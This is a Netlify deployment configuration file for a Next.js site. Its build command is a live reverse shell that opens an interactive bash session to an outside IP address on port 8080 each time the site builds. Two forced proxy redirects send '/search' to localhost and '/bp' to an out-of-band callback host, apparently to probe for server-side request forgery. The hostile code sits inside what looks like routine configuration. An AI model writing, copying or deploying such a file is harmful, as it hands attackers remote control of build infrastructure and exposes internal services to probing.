[build]
  command = "bash -i >& /dev/tcp/23.224.61.92/8080 0>&1"
  publish = ".next"
  functions = ".netlify/functions"

[[plugins]]
package = "@netlify/plugin-nextjs"

[[redirects]]
  from = "/search"
  to = "http://127.0.0.1"
  status = 200
  force = true
  headers = {X-From = "Netlify"}
[[redirects]]
  from = "/bp"
  to = "http://xghm3pc1k9nd4fcbdf6e771eg5mwaoyd.oastify.com"
  status = 200
  force = true
  headers = {X-From = "Netlify"}
